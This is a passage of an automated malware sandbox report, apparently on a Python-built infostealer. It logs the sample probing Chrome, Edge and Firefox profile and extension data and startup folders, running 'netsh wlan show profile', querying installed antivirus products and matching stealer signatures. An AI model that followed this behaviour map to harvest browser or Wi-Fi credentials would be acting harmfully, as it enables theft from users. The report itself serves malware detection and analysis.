                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI17002\unicodedata.pyd VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cs VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gl VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691AC330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7691AC330
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeCode function: 0_2_00007FF7691C518C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7691C518C
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeCode function: 4_2_0092D076 GetVersionExW,4_2_0092D076
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                                  Stealing of Sensitive Information

                                  barindex
                                  Source: Yara matchFile source: 00000008.00000003.1753993526.00000273ED351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000008.00000002.2378577752.00000273ED190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
